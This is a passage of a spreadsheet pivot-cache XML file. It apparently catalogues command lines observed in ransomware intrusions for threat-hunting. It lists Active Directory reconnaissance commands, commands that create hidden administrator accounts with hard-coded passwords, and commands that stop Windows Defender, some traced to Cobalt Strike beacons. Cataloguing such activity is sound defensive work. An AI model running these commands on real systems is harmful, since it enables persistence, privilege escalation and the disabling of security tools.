    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0846"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Group Policy Creator Owners&quot; default /add /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0847"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Schema Admins&quot; default /add /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0848"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;domain users&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0849"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net user default /active:yes /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0850"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net user /add default &lt;password&gt; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0886"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net user Adm1nBac P@ssW0dDP@ssW /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="29"/>
  </r>
  <r>
    <s v="ransom-eid0887"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net user Adm1nBac /active:yes"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="29"/>
  </r>
  <r>
    <s v="ransom-eid0888"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net localgroup Administrators Adm1nBac /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="29"/>
  </r>
  <r>
    <s v="ransom-eid0912"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group “Domain admins” /dom"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="30"/>
  </r>
  <r>
    <s v="ransom-eid0913"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net localgroup “Administrators” /dom "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="30"/>
  </r>
  <r>
    <s v="ransom-eid0921"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="cmd.exe /Q /c net user &lt;admin&gt; /active:yes 1&gt; \\127.0.0.1\C$\Windows\Temp\&lt;folder&gt; 2&gt;&amp;1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="31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31"/>
  </r>
  <r>
    <s v="ransom-eid0931"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="31"/>
  </r>
  <r>
    <s v="ransom-eid0932"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group 'Domain Admins' /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="31"/>
  </r>
  <r>
    <s v="ransom-eid0933"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group 'Domain Computers' /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="31"/>
  </r>
  <r>
    <s v="ransom-eid0934"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net user /domain "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="31"/>
  </r>
  <r>
    <s v="ransom-eid0986"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view &lt;device&gt;\Files$ /all"/>
    <s v="wab.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0988"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net use"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0989"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Domain computers&quot; /dom"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0990"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Enterprise Admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0991"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;domain admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0992"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net localgroup administrators"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid1027"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net config workstation"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1030"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view /all /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1031"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1032"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Domain Admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1046"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net user oldadministrator &quot;qc69t4B#Z0kE3&quot; /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1047"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net localgroup Administrators oldadministrator /ADD"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1073"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="cmd.exe /c net groups /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1074"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &lt;redacted&gt; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1076"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="cmd.exe /c net time /t"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1078"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Access Control Assistance Operators&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1090"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="cmde.exe /c net view &lt;host&gt; /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1091"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="cmd.exe /c net config workstation"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1104"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net user"/>
    <m/>
    <m/>
    <s v="screenconnect.clientservices.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid1107"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;domain admins&quot; /domain"/>
    <m/>
    <m/>
    <s v="screenconnect.clientservices.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18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18"/>
  </r>
  <r>
    <s v="ransom-eid1142"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net user"/>
    <s v="cmd.exe /c &quot;C:\Windows\TEMP\ScreenConnect\22.8.9717.8313\{&lt;uuid&gt;}run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid1151"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="cmd.exe /C net user administrator &lt;pwd&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid1169"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net config workstation"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1172"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view /all /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1173"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1174"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Domain Admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1176"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net  group &quot;domain admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1177"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net  user [REDACTED DOMAIN ADMIN] /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1178"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net  user Administrator /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1179"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net  user [REDACTED DOMAIN ADMIN] /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1223"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net config workstation"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1224"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Domain Admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1225"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Domain Computers&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1226"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;domain admins&quot; /dom"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1227"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;enterprise admins&quot; /dom"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1228"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net localgroup &quot;administrators&quot; /dom"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1229"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1230"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view /all /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1257"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view /all /domain"/>
    <s v="rundll32  c:\users\&lt;&gt;\AppData\Local\Temp\easygoing.data,#1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1258"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Domain Admins&quot; /domain"/>
    <s v="rundll32  c:\users\&lt;&gt;\AppData\Local\Temp\easygoing.data,#1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1263"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net config workstation"/>
    <s v="rundll32  c:\users\&lt;&gt;\AppData\Local\Temp\easygoing.data,#1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1264"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="cmd.exe /C net group &quot;domain admins&quot; /domain"/>
    <s v="c:\users\&lt;&gt;\AppData\Local\Temp\Nigu.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1265"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="cmd.exe /C net group &quot;enterprise admins&quot; /domain"/>
    <s v="c:\users\&lt;&gt;\AppData\Local\Temp\Nigu.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1266"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="cmd.exe /c net time"/>
    <s v="c:\users\&lt;&gt;\AppData\Local\Temp\Nigu.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1267"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="cmd.exe /c net user &lt;&gt; /domain"/>
    <s v="c:\users\&lt;&gt;\AppData\Local\Temp\Nigu.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1303"/>
    <s v="netclt-pid"/>
    <s v="Typo"/>
    <s v="net group administartors /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1304"/>
    <s v="netclt-pid"/>
    <s v="Typo"/>
    <s v="C:\Windows\system32\cmd.exe /C net ttime"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1330"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Domain Computers&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1331"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Domain Admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1340"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1341"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;domain computers&quot; /domain "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1342"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group /domain &quot;Domain controllers&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1343"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;domain admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1345"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group /domain &quot;Domain controller&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1346"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group /domain &quot;Domain controller&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1371"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net config workstation"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="ransom-eid1374"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view /all /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="ransom-eid1375"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="ransom-eid1376"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net.exe net group &quot;Domain Admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="ransom-eid1382"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net stop security center"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="33"/>
  </r>
  <r>
    <s v="ransom-eid1383"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net stop WinDefend"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="33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5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5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5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5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5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5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5"/>
  </r>
  <r>
    <s v="ransom-eid0136"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0143"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /dclist:&lt;DOMAINNAME&gt;.local"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0148"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0149"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /dclist:&lt;DOMAIN&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0151"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /FINDUSER:REDACTED"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0166"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="cmd.exe /c nltest /dclist"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0177"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C nltest /dclist &lt;domainname redacted&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0178"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest  /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0263"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /dclist:&quot;NameDomain&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0268"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0303"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0308"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0312"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /dclist:"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0323"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0324"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /dclist:DOMAIN"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0327"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0328"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /dclist:&quot;DOMAIN&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0341"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0348"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="cmd.exe /c nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0357"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0372"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0373"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts  /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0390"/>
    <s v="nltest-pid"/>
    <s v="Disco Commands From Beacon"/>
    <s v="nltest /domain_trusts"/>
    <m/>
    <m/>
    <s v="rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0391"/>
    <s v="nltest-pid"/>
    <s v="Disco Commands From Beacon"/>
    <s v="nltest /domain_trusts  /all_trusts"/>
    <m/>
    <m/>
    <s v="rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0397"/>
    <s v="nltest-pid"/>
    <s v="Disco Commands From Beacon"/>
    <s v="cmd /c nltest /dclist"/>
    <m/>
    <m/>
    <s v="icjul.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0409"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /dclist:&lt;hidden&gt;.local"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0410"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0462"/>
    <s v="nltest-pid"/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0496"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0523"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0527"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /dclist "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0557"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="cmd.exe /c nltest /dclist"/>
    <s v="rundll32.exe c:\users\&lt;&gt;\appdata\local\temp\37b.dll, entrypoint"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0562"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="cmd c/ nltest /domain_trusts /all_trusts"/>
    <s v="rundll32.exe c:\users\&lt;&gt;\appdata\local\temp\37b.dll, entrypoint"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0566"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0595"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0596"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0600"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="cmd.exe /C nltest /dclist:"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0706"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain _ trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0707"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /dclist"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0841"/>
